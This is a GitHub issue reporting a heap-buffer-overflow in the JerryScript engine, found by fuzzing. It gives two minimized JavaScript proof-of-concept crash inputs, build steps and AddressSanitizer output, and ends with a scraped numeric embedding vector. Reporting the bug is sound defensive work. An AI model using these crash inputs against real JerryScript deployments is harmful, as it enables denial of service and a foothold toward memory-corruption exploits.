(/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #10 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #11 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #12 0x55555563e211 (/home/docker/asan/jerryscript/build/bin/jerry+0xea211) #13 0x5555555c1f67 (/home/docker/asan/jerryscript/build/bin/jerry+0x6df67) #14 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #15 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #16 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #17 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #18 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #19 0x555555625454 (/home/docker/asan/jerryscript/build/bin/jerry+0xd1454) #20 0x555555634129 (/home/docker/asan/jerryscript/build/bin/jerry+0xe0129) #21 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462) #22 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #23 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8) #24 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2) #25 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #26 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8) #27 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2) #28 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #29 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #30 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #31 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #32 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #33 0x5555555ca181 (/home/docker/asan/jerryscript/build/bin/jerry+0x76181) #34 0x5555557c982d (/home/docker/asan/jerryscript/build/bin/jerry+0x27582d) #35 0x55555592b342 (/home/docker/asan/jerryscript/build/bin/jerry+0x3d7342) #36 0x5555555718c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x1d8c9) #37 0x7ffff73ba0b2 (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #38 0x555555580add (/home/docker/asan/jerryscript/build/bin/jerry+0x2cadd) Address 0x612000005692 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b) Shadow bytes around the buggy address: 0x0c247fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c247fff8ad0: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==38036==ABORTING Aborted ``` ###### Output See above. ###### Backtrace See above. ###### Expected behavior Not to crash
Heap-overflow on an ill-formed JS program
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4754/comments
1
2021-08-28T22:00:46
2021-11-02T07:36:17Z
https://github.com/jerryscript-project/jerryscript/issues/4754
981,936,669
4,754
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Heap-overflow on an ill-formed JS program Issue date: --- start body --- ###### JerryScript revision ```sh $ jerry --version Version: 3.0.0 (5a69b183) ``` ###### Build platform ```sh $ echo "$(lsb_release -ds) ($(uname -mrs))" Ubuntu 20.04.1 LTS (Linux 4.15.0-142-generic x86_64) ``` ###### Build steps ```sh $ python tools/build.py ``` ###### Test case There are two test cases, where `jerry_poc_crash.js` can trigger a direct crash of the clean-built jerry and `jerry_poc_asan.js` can trigger a heap-overflow of the ASAN-enabled-built jerry. This bug is found by a naive fuzzer. And I use `afl-tmin` to reduce the test cases. I sincerely apologize for making them struggling. + jerry_poc_crash.js ```js R=function(){({0:0}) function x(){for(v in 0){function o(){}function x(){for(;;)for(function(){class A extends function(){for(let;;){((function(){}))}0=function(){} class e ``` + jerry_poc_asan.js ```js R = function() { function x(){ function y(){ for(;;) for(function(){ class A extends function() { for(let;;) { ((function(){})) } ``` ###### Execution steps ```sh $ ~/release/jerryscript/build/bin/jerry jerry_poc_crash.js Segmentation fault (core dumped) ``` ```sh $ ~/asan/jerryscript/build/bin/jerry jerry_poc_asan.js ==38036==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000005692 at pc 0x55555566952c bp 0x7fffffff9020 sp 0x7fffffff9010 READ of size 1 at 0x612000005692 thread T0 #0 0x55555566952b (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b) #1 0x55555566a84e (/home/docker/asan/jerryscript/build/bin/jerry+0x11684e) #2 0x555555589aa2 (/home/docker/asan/jerryscript/build/bin/jerry+0x35aa2) #3 0x55555579d5c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x2495c9) #4 0x5555555dead1 (/home/docker/asan/jerryscript/build/bin/jerry+0x8aad1) #5 0x555555633868 (/home/docker/asan/jerryscript/build/bin/jerry+0xdf868) #6 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462) #7 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #8 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #9 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #10 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #11 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #12 0x55555563e211 (/home/docker/asan/jerryscript/build/bin/jerry+0xea211) #13 0x5555555c1f67 (/home/docker/asan/jerryscript/build/bin/jerry+0x6df67) #14 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #15 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #16 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #17 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #18 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #19 0x555555625454 (/home/docker/asan/jerryscript/build/bin/jerry+0xd1454) #20 0x555555634129 (/home/docker/asan/jerryscript/build/bin/jerry+0xe0129) #21 0x5555555c6462 (/home/docker/asan/jerryscript/build/bin/jerry+0x72462) #22 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #23 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8) #24 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2) #25 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #26 0x55555560b8c8 (/home/docker/asan/jerryscript/build/bin/jerry+0xb78c8) #27 0x5555555c61c2 (/home/docker/asan/jerryscript/build/bin/jerry+0x721c2) #28 0x5555557c2c8e (/home/docker/asan/jerryscript/build/bin/jerry+0x26ec8e) #29 0x5555555f4ea1 (/home/docker/asan/jerryscript/build/bin/jerry+0xa0ea1) #30 0x5555555f6d8e (/home/docker/asan/jerryscript/build/bin/jerry+0xa2d8e) #31 0x5555556188ae (/home/docker/asan/jerryscript/build/bin/jerry+0xc48ae) #32 0x55555562451a (/home/docker/asan/jerryscript/build/bin/jerry+0xd051a) #33 0x5555555ca181 (/home/docker/asan/jerryscript/build/bin/jerry+0x76181) #34 0x5555557c982d (/home/docker/asan/jerryscript/build/bin/jerry+0x27582d) #35 0x55555592b342 (/home/docker/asan/jerryscript/build/bin/jerry+0x3d7342) #36 0x5555555718c9 (/home/docker/asan/jerryscript/build/bin/jerry+0x1d8c9) #37 0x7ffff73ba0b2 (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #38 0x555555580add (/home/docker/asan/jerryscript/build/bin/jerry+0x2cadd) Address 0x612000005692 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/docker/asan/jerryscript/build/bin/jerry+0x11552b) Shadow bytes around the buggy address: 0x0c247fff8a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c247fff8ad0: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fff8b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==38036==ABORTING Aborted ``` ###### Output See above. ###### Backtrace See above. ###### Expected behavior Not to crash --- end body ---
6,588
[ -0.04191902279853821, -0.015325548127293587, -0.010793564841151237, 0.009472648613154888, 0.030067265033721924, -0.003842333797365427, -0.023367812857031822, 0.016405634582042694, -0.04188983142375946, 0.027162710204720497, -0.01701865717768669, 0.00758249731734395, 0.009815649129450321, 0.004776462446898222, 0.01786521077156067, 0.023966237902641296, -0.02736704982817173, 0.005199739709496498, -0.029133137315511703, -0.006214145105332136, 0.007801434025168419, 0.004696185700595379, -0.03637263551354408, 0.053157757967710495, 0.00213098106905818, 0.004907824564725161, 0.003340604715049267, 0.011618224903941154, -0.01631806045770645, 0.0020032681059092283, -0.013632440008223057, 0.01446439791470766, -0.021820660680532455, 0.013698120601475239, 0.055376313626766205, 0.007961987517774105, 0.04632694274187088, 0.05563903599977493, -0.00453563267365098, 0.0014614005340263247, 0.029249902814626694, -0.023615939542651176, -0.016536995768547058, 0.025017132982611656, 0.02257964015007019, 0.037160806357860565, 0.03596395254135132, 0.0022787631023675203, -0.040196724236011505, 0.028797434642910957, 0.02433113195002079, 0.01504822913557291, 0.007410997059196234, -0.06684858351945877, 0.014931462705135345, -0.016201293095946312, 0.01292454544454813, -0.0005833742907270789, 0.015821803361177444, 0.010560032911598682, -0.0016401985194534063, -0.0332491397857666, -0.004641451872885227, 0.016960272565484047, 0.004236419219523668, 0.03824089094996452, -0.022448278963565826, 0.023221854120492935, 0.007910901680588722, 0.019864829257130623, -0.0004280662687961012, -0.010290010832250118, 0.03523416444659233, 0.03292803466320038, 0.014727122150361538, 0.000870728341396898, -0.007009613793343306, 0.029643988236784935, -0.03070947900414467, 0.0012826024321839213, -0.012209353037178516, 0.022565044462680817, -0.006531602703034878, 0.02008376643061638, -0.0022039597388356924, -0.0029921308159828186, -0.015559080056846142, -0.06101027876138687, -0.0021401033736765385, -0.03205228969454765, -0.010165946558117867, 0.03254854679107666, -0.0025086463429033756, 0.011786076240241528, -0.014836589805781841, 0.01884312555193901, -0.0437580905854702, 0.008450944907963276, -0.047202687710523605, 0.026374539360404015, 0.002970237284898758, 0.010246223770081997, -0.032957226037979126, 0.023484578356146812, -0.020142149180173874, 0.040313489735126495, 0.0037438124418258667, -0.008224710822105408, 0.054208654910326004, 0.10882598906755447, 0.016872698441147804, -0.018011167645454407, -0.044166769832372665, -0.005579229444265366, -0.013595950789749622, 0.002161996904760599, -0.013362418860197067, -0.020813554525375366, -0.03511739894747734, -0.005699644330888987, -0.012165565975010395, -0.0121071832254529, -0.03103058598935604, 0.004313047043979168, -0.03829927369952202, 0.015500697307288647, 0.00615211296826601, -0.02211257629096508, 0.015077420510351658, -0.025630155578255653, -0.050238605588674545, -0.05079324543476105, 0.01434763241559267, -0.02008376643061638, 0.02351376973092556, -0.008786647580564022, -0.02234610915184021, 0.023075897246599197, -0.011829863302409649, -0.04796166718006134, -0.045217666774988174, -0.025995049625635147, 0.01872636005282402, -0.0110781816765666, 0.015135803259909153, 0.0012762168189510703, -0.01230422593653202, 0.01853661611676216, -0.034008122980594635, -0.010370288044214249, 0.007721157278865576, -0.00998349953442812, 0.01970427669584751, 0.014143291860818863, 0.024666834622621536, -0.01450088806450367, 0.014354930259287357, 0.041364382952451706, 0.003809493500739336, 0.01504822913557291, -0.02507551573216915, -0.05123111978173256, -0.019631298258900642, -0.026870794594287872, -0.05213605612516403, -0.0040101851336658, 0.012800482101738453, 0.032373394817113876, 0.011975821107625961, 0.0033260087948292494, -0.02199581079185009, -0.0067541878670454025, 0.008669881150126457, 0.056777507066726685, -0.05972585082054138, 0.0062907724641263485, 0.01113656535744667, 0.015734229236841202, -0.011494161561131477, -0.00731977354735136, 0.026768624782562256, 0.009706180542707443, -0.007538710255175829, -0.005754378624260426, 0.01783601939678192, -0.019835637882351875, 0.01272750273346901, -0.034358419477939606, 0.008976392447948456, -0.023499174043536186, 0.003605152713134885, -0.024652238935232162, -0.0121071832254529, -0.011421182192862034, 0.04188983142375946, 0.007425593212246895, -0.009698882699012756, -0.02309049293398857, 0.004944313783198595, 0.0017697359435260296, 0.03555527329444885, -0.006323613226413727, -0.037277571856975555, -0.033657822757959366, -0.03678131476044655, -0.008677178993821144, 0.007896305993199348, 0.018945297226309776, 0.0210178941488266, 0.005188792943954468, -0.006206846795976162, -0.010808160528540611, 0.016376443207263947, -0.034008122980594635, -0.03940855339169502, -0.012588842771947384, -0.003860578639432788, 0.0012616210151463747, -0.053040992468595505, 0.009239115752279758, 0.012537757866084576, -0.01534014381468296, -0.037861403077840805, -0.014924164861440659, -0.0431450679898262, -0.031088968738913536, -0.019835637882351875, 0.020653000101447105, -0.01783601939678192, 0.003955450840294361, 0.02592206932604313, -0.01412869617342949, -0.003842333797365427, 0.02047785185277462, 0.030738670378923416, -0.0003290887689217925, -0.015369335189461708, 0.022054193541407585, 0.031672798097133636, 0.024550069123506546, -0.005863846745342016, -0.010362989269196987, -0.04536362364888191, -0.04839954152703285, 0.014106802642345428, 0.035059016197919846, -0.04469221830368042, -0.03748191148042679, -0.0013491956051439047, 0.00015063281171023846, -0.01833227463066578, -0.028213605284690857, -0.02227313071489334, -0.03117654286324978, -0.012034203857183456, 0.015369335189461708, 0.002614465542137623, 0.006192251108586788, -0.013406205922365189, -0.003937206231057644, 0.02152874693274498, 0.028636882081627846, -0.004477249458432198, 0.020725978538393974, 0.01463954709470272, 0.007031507324427366, -0.03406650573015213, -0.016420230269432068, -0.0062031978741288185, -0.01259614061564207, 0.06398781388998032, -0.0390874445438385, -0.0169310811907053, 0.006962177809327841, 0.0000044435823838284705, -0.004207227844744921, 0.00998349953442812, -0.0002353566378587857, 0.0030997744761407375, -0.014427908696234226, 0.031439267098903656, 0.008239306509494781, 0.03748191148042679, 0.023367812857031822, -0.004787409212440252, 0.019018275663256645, 0.049888309091329575, -0.004488196223974228, 0.003446423914283514, -0.021557938307523727, -0.012545055709779263, -0.03070947900414467, 0.0007056137546896935, 0.010326500050723553, 0.03561365604400635, 0.03059271350502968, -0.0023116033989936113, -0.006797975394874811, -0.005936825647950172, 0.017938189208507538, -0.020229723304510117, -0.03371620550751686, -0.007699263282120228, 0.041597917675971985, -0.03818250820040703, 0.012092587538063526, 0.009771861135959625, 0.007801434025168419, -0.007432891055941582, 0.0007785925990901887, 0.05201929062604904, -0.04250285401940346, -0.018478231504559517, -0.016303464770317078, -0.038912296295166016, -0.01125333085656166, 0.022433683276176453, -0.0036945517640560865, -0.019558317959308624, 0.006637421902269125, -0.05318694934248924, -0.04676481708884239, -0.029264498502016068, 0.007611688692122698, 0.05091001093387604, -0.002802385948598385, -0.017354357987642288, 0.018974488601088524, -0.04886660352349281, 0.011829863302409649, 0.01477090921252966, -0.047319453209638596, -0.040897320955991745, -0.019237210974097252, -0.027002155780792236, -0.04994669184088707, -0.024827387183904648, 0.025236070156097412, 0.031556032598018646, -0.012909949757158756, -0.033774588257074356, 0.015559080056846142, -0.02853471040725708, 0.006637421902269125, 0.009822946973145008, -0.03292803466320038, -0.007801434025168419, 0.018697168678045273, 0.03339510038495064, 0.036022335290908813, 0.0010609292658045888, 0.04434191808104515, 0.01977725513279438, 0.01985023356974125, 0.04051782935857773, -0.03678131476044655, -0.03952531889081001, -0.019105849787592888, 0.01900367997586727, -0.001372001483105123, -0.0007503132801502943, -0.009224520064890385, 0.030154841020703316, 0.016609974205493927, 0.0036069771740585566, -0.012822375632822514, 0.0049808030016720295, 0.002450263127684593, -0.034621141850948334, -0.010370288044214249, -0.0221563633531332, 0.020390277728438377, -0.018624190241098404, -0.005987910553812981, 0.0018044008174911141, -0.05616448447108269, 0.007699263282120228, -0.00004418638491188176, -0.037627868354320526, 0.009333988651633263, -0.00036694653681479394, 0.007516816258430481, 0.034504376351833344, -0.03456275910139084, -0.010290010832250118, 0.011494161561131477, -0.014376823790371418, 0.03701484948396683, -0.001591850072145462, 0.020156744867563248, -0.00854581780731678, 0.047319453209638596, -0.05123111978173256, -0.028096837922930717, -0.018011167645454407, 0.018755551427602768, -0.02066759578883648, -0.04656047374010086, 0.011012501083314419, -0.035993143916130066, 0.0023225503973662853, -0.015033632516860962, -0.006429432425647974, -0.0020780712366104126, -0.020696787163615227, 0.005495303776115179, -0.009501839987933636, -0.01884312555193901, 0.0014714350691065192, 0.01113656535744667, 0.03432922810316086, -0.0326945036649704, -0.025834495201706886, 0.005630314350128174, 0.03756948560476303, 0.02930828556418419, 0.017850615084171295, -0.0268561989068985, -0.02304670587182045, 0.010676798410713673, -0.03724838048219681, 0.0001980690285563469, 0.04536362364888191, 0.01623048447072506, -0.02328023687005043, 0.009837542660534382, -0.019485339522361755, 0.01615750603377819, 0.014179781079292297, -0.012296928092837334, -0.004375079181045294, -0.009531031362712383, 0.006374698132276535, 0.03126411885023117, 0.0025104708038270473, -0.04186064004898071, -0.02892879582941532, -0.02047785185277462, -0.04016753286123276, -0.022565044462680817, 0.00916613731533289, 0.014493590220808983, -0.019791850820183754, -0.03514659032225609, 0.00571424001827836, -0.023601343855261803, -0.04600583761930466, 0.0012178337201476097, -0.0033479025587439537, 0.01243558805435896, 0.0013957195915281773, 0.004152493551373482, -0.009195328690111637, 0.02382028102874756, 0.03438761085271835, -0.004513738676905632, -0.044283535331487656, -0.009749967604875565, -0.02292993851006031, 0.02028810605406761, 0.012639928609132767, 0.017660869285464287, 0.007764944341033697, 0.0009970729006454349, -0.013019418343901634, 0.061652492731809616, 0.014938760548830032, -0.030884629115462303, 0.0008689038222655654, -0.04714430496096611, 0.013938951306045055, 0.011391990818083286, -0.002120034070685506, 0.01977725513279438, -0.005936825647950172, 0.008932605385780334, 0.025673942640423775, -0.030388372018933296, 0.005568282678723335, -0.05108515918254852, -0.0029793595895171165, -0.015252569690346718, 0.015208781696856022, 0.025367431342601776, 0.020696787163615227, -0.017237592488527298, 0.03824089094996452, 0.019879424944519997, 0.014902271330356598, 0.02183525636792183, 0.00434953672811389, -0.010107563808560371, -0.04367051273584366, -0.03605152666568756, 0.005298261065036058, -0.024827387183904648, -0.021791469305753708, -0.007808731868863106, 0.035409312695264816, 0.014121398329734802, 0.010946820490062237, -0.06398781388998032, 0.04915852099657059, 0.0128296734765172, -0.022521257400512695, -0.020959511399269104, -0.046735625714063644, 0.05353724956512451, -0.0005053781787864864, -0.04224013164639473, 0.011289820075035095, -0.05768244341015816, 0.007604390848428011, -0.019718872383236885, -0.00749492272734642, -0.0432034507393837, 0.008859626017510891, -0.000043416686821728945, 0.04387485608458519, 0.019602105021476746, -0.011939331889152527, 0.00011813443416031078, -0.012311523780226707, 0.04130600020289421, 0.03394973650574684, -0.005404080264270306, 0.021630916744470596, -0.013420801609754562, -0.010983309708535671, -0.03138088434934616, -0.028447136282920837, 0.01744193397462368, -0.030534330755472183, 0.05336209759116173, -0.006611879449337721, -0.0029556413646787405, -0.01961670257151127, 0.04180225729942322, 0.002871715696528554, -0.00029602026916109025, -0.0009633201989345253, 0.04460464417934418, -0.024579260498285294, 0.01611371897161007, -0.006641070824116468, 0.005046484060585499, -0.0018463636515662074, 0.017471125349402428, 0.020273510366678238, 0.015748824924230576, -0.004590366501361132, -0.020682191476225853, 0.012756694108247757, 0.01720840111374855, -0.004696185700595379, -0.009531031362712383, -0.022214746102690697, 0.008677178993821144, -0.002702040132135153, -0.017427338287234306, -0.008399860002100468, -0.009180733002722263, 0.0020233371760696173, 0.0030176735017448664, -0.023995429277420044, -0.010297308675944805, 0.0003740163519978523, 0.04226932302117348, -0.04384566470980644, 0.017500316724181175, 0.021163852885365486, -0.008969094604253769, 0.007316124625504017, -0.02008376643061638, -0.00417438754811883, -0.01103439461439848, -0.03427084535360336, -0.006279825698584318, 0.007808731868863106, -0.016128314658999443, 0.030184032395482063, -0.009903223253786564, -0.009399669244885445, 0.03313237428665161, -0.009968903847038746, -0.039029061794281006, 0.017894402146339417, 0.0064330813474953175, 0.025060920044779778, -0.019412361085414886, -0.01844904012978077, -0.010625713504850864, -0.02635994367301464, -0.0030158490408211946, 0.02078436315059662, -0.011450373567640781, -0.0033862164709717035, 0.010428670793771744, 0.033073991537094116, -0.02484198287129402, 0.006349155679345131, 0.009392371401190758, 0.0005528143956325948, -0.02865147776901722, -0.028199007734656334, 0.016960272565484047, -0.01177877839654684, 0.0015015387907624245, -0.0030049020424485207, 0.019237210974097252, -0.001441331347450614, 0.031234927475452423, 0.03538012132048607, -0.012734800577163696, -0.005987910553812981, 0.0015015387907624245, 0.0019704275764524937, 0.020258914679288864, -0.011472267098724842, 0.028447136282920837, 0.013931653462350368, -0.05438380315899849, -0.006473219487816095, -0.020974107086658478, -0.001686722505837679, 0.04752379655838013, -0.01914963684976101, -0.006057240534573793, -0.010326500050723553, -0.011530650779604912, -0.01074247993528843, 0.016128314658999443, -0.01113656535744667, -0.02904556319117546, -0.008224710822105408, 0.04305749386548996, 0.03707323223352432, 0.02328023687005043, -0.025557175278663635, -0.033891353756189346, -0.003893418936058879, 0.018011167645454407, -0.0016575310146436095, -0.006495113484561443, -0.03211067244410515, -0.003860578639432788, 0.00551719730719924, 0.0122604388743639, 0.017704656347632408, 0.032606929540634155, -0.01021703239530325, -0.014004631899297237, 0.030534330755472183, 0.011304416693747044, 0.005082973279058933, 0.015427718870341778, 0.046151794493198395, 0.04571392014622688, -0.02927909418940544, -0.01485118642449379, -0.02024431899189949, -0.0259658582508564, -0.007509518414735794, 0.0036872539203613997, 0.017471125349402428, -0.00542962271720171, -0.018127935007214546, 0.004688887856900692, -0.00329499295912683, 0.03281126916408539, -0.006352804601192474, 0.0023645132314413786, 0.009253712370991707, 0.018594998866319656, -0.001423086621798575, -0.02203959785401821, -0.0035796102602034807, 0.01569044217467308, -0.025440409779548645, 0.02253585308790207, -0.021616321057081223, 0.007969285361468792, 0.007418294902890921, 0.012763991951942444, -0.031789567321538925, -0.0025852739345282316, -0.01895989291369915, 0.019018275663256645, 0.006352804601192474, -0.01380029134452343, 0.012428290210664272, 0.009954308159649372, 0.04051782935857773, 0.016726741567254066, -0.0034774397499859333, -0.016405634582042694, 0.023134279996156693, 0.016420230269432068, -0.012778587639331818, -0.019923212006688118, -0.005896687041968107, 0.003710971912369132, -0.012990226969122887, 0.009874031879007816, 0.024783600121736526, 0.022521257400512695, 0.0006230564904399216, 0.0011877299984917045, 0.03286965191364288, 0.021309809759259224, -0.007338018622249365, 0.006144815124571323, -0.014559270814061165, 0.029527222737669945, 0.018857721239328384, -0.034008122980594635, 0.013092396780848503, 0.008480136282742023, -0.004743622150272131, 0.0031380883883684874, -0.02028810605406761, -0.017471125349402428, -0.035526081919670105, -0.048020049929618835, -0.012975630350410938, -0.02682700753211975, 0.005042835138738155, 0.015281761065125465, -0.0044298130087554455, 0.012275034561753273, -0.003705498529598117, -0.053040992468595505, 0.009925116784870625, -0.0019083956722170115, -0.04889579489827156, 0.02087193727493286, -0.00953832920640707, -0.003353375941514969, -0.01512120757251978, 0.017719252035021782, 0.009604009799659252, 0.024185175076127052, 0.0021546990610659122, -0.019514530897140503, 0.004714430309832096, -0.027629774063825607, -0.012092587538063526, 0.0006444940227083862, -0.03427084535360336, 0.01966048963367939, -0.009961606003344059, 0.021149257197976112, -0.009399669244885445, -0.009903223253786564, -0.023426195606589317, 0.018084146082401276, 0.008107944391667843, -0.02706053853034973, 0.016493208706378937, 0.006531602703034878, 0.011632820591330528, 0.020302701741456985, 0.0011375570902600884, 0.019529126584529877, 0.009589414112269878, -0.003878823248669505, 0.011129267513751984, -0.03254854679107666, -0.00010160017700400203, -0.003309588646516204, 0.01274939626455307, -0.016551591455936432, -0.035526081919670105, -0.0040868129581213, 0.016522400081157684, -0.025630155578255653, -0.015267165377736092, 0.01947074383497238, 0.01442061085253954, 0.029439648613333702, -0.01631806045770645, -0.0033935143146663904, 0.005020941607654095, 0.02487117610871792, -0.010450564324855804, 0.013931653462350368, 0.012019608169794083, -0.019675085321068764, 0.023732706904411316, -0.002174768364056945, -0.010012691840529442, -0.02748381718993187, 0.0215725339949131, -0.003867876483127475, -0.015705037862062454, -0.0338621623814106, -0.002581625012680888, 0.02472521737217903, -0.008910711854696274, -0.005885740276426077, 0.013690822757780552, 0.022331513464450836, -0.02519228123128414, 0.013756504282355309, 0.015413123182952404, -0.02075517177581787, -0.006075485143810511, 0.005064728669822216, -0.02300291880965233, 0.022550448775291443, 0.0002494962827768177, 0.014778207056224346, 0.010771671310067177, -0.0081736259162426, 0.01292454544454813, -0.010275415144860744, 0.029571009799838066, -0.008027668111026287, 0.0036817805375903845, 0.014778207056224346, -0.009392371401190758, -0.0048275478184223175, 0.01477090921252966, -0.0344168022274971, 0.021163852885365486, 0.015836399048566818, 0.0279946681112051, 0.001604621415026486, 0.025163089856505394, 0.0026454816106706858, -0.02344079129397869, -0.02717730589210987, -0.020842745900154114, 0.008232008665800095, -0.05289503559470177, 0.017033252865076065, -0.02001078799366951, 0.01865338161587715, -0.028199007734656334, 0.038445230573415756, 0.004141546785831451, -0.007816029712557793, 0.029089350253343582, -0.006126570515334606, -0.007764944341033697, -0.007597093004733324, -0.022214746102690697, 0.005473410245031118, -0.005860197823494673, -0.03453356772661209, 0.04256123676896095, 0.018157126381993294, 0.0059149316512048244, 0.03091382049024105, -0.010114861652255058, -0.004907824564725161, -0.0080203702673316, -0.0037766529712826014, 0.005495303776115179, -0.008005774579942226, 0.03590556979179382, 0.017879806458950043, 0.005433271639049053, -0.024623047560453415, 0.022331513464450836, -0.014033823274075985, -0.015894783660769463, -0.05161060765385628, -0.021966619417071342, -0.031701989471912384, -0.0011685730423778296, -0.014004631899297237, 0.030184032395482063, 0.006641070824116468, -0.003727392293512821, -0.005911282729357481, -0.025236070156097412, -0.015850994735956192, 0.011246033012866974, 0.016945676878094673, 0.0008419929072260857, 0.03301560878753662, -0.0361974835395813, -0.002590747317299247, 0.010268117301166058, -0.019762659445405006, 0.0251047071069479, -0.027089731767773628, -0.014530079439282417, -0.00953832920640707, 0.004207227844744921, -0.019456148147583008, -0.0349714420735836, -0.02463764324784279, 0.021616321057081223, 0.040430255234241486, -0.018230104818940163, 0.0008173625683411956, -0.001235166215337813, -0.013106992468237877, -0.009209924377501011, -0.014033823274075985, -0.015150398947298527, -0.04769894480705261, 0.004911473486572504, 0.01160362921655178, 0.021032489836215973, -0.0026546039152890444, -0.016215888783335686, 0.018813934177160263, 0.027921689674258232, 0.002432018518447876, -0.015894783660769463, -0.026213984936475754, -0.0014741717604920268, -0.012311523780226707, -0.04667723923921585, 0.017660869285464287, 0.005283665377646685, 0.05143545940518379, 0.013574057258665562, -0.012136374600231647, -0.026403730735182762, -0.009209924377501011, -0.027629774063825607, -0.015850994735956192, -0.024710621684789658, -0.0003236153570469469, -0.022944534197449684, 0.012238545343279839, -0.0008971831412054598, 0.0055865272879600525, 0.025630155578255653, -0.011129267513751984, 0.01977725513279438, 0.0014787329128012061, -0.0018281189259141684, 